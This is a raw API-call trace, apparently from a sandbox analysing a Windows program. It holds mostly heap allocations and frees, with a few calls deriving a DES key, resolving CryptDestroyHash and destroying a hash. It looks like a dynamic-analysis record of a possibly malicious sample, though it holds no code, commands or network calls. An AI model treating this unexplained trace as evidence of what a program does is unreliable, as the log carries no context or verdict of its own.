RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0255.956] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0255.956] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0255.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.956] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0255.956] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.956] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0255.957] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.958] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0255.959] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.960] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.960] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0255.961] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.961] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.961] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.962] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.962] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.962] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.963] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.963] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.963] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0255.963] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.963] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.964] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0255.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0255.965] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0255.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0255.966] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0255.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0255.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0255.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.966] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.966] CryptDestroyHash (hHash=0xaa5920) returned 1 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0255.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0255.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0255.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0255.967] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0255.968] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0255.969] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) 